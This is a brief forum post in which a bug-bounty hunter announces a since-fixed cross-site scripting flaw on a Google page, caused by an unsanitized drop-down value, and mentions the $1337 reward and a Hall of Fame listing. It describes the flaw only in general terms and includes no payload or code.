Hey guys, just wanted to share a POC thread for an XSS vuln on Google. This has been confirmed fixed by a Google security engineer.
Basically, Acura was a string selected from a drop-down bar. It was incorrectly sanitized, and closing it off and including your own piece of JavaScript/HTML would get it executed.
Here's a POC video I made when I found it.
Google wired me $1337, and a spot on their "Reward Recipients" Hall of Fame list.
Good luck and if you have any questions let me know!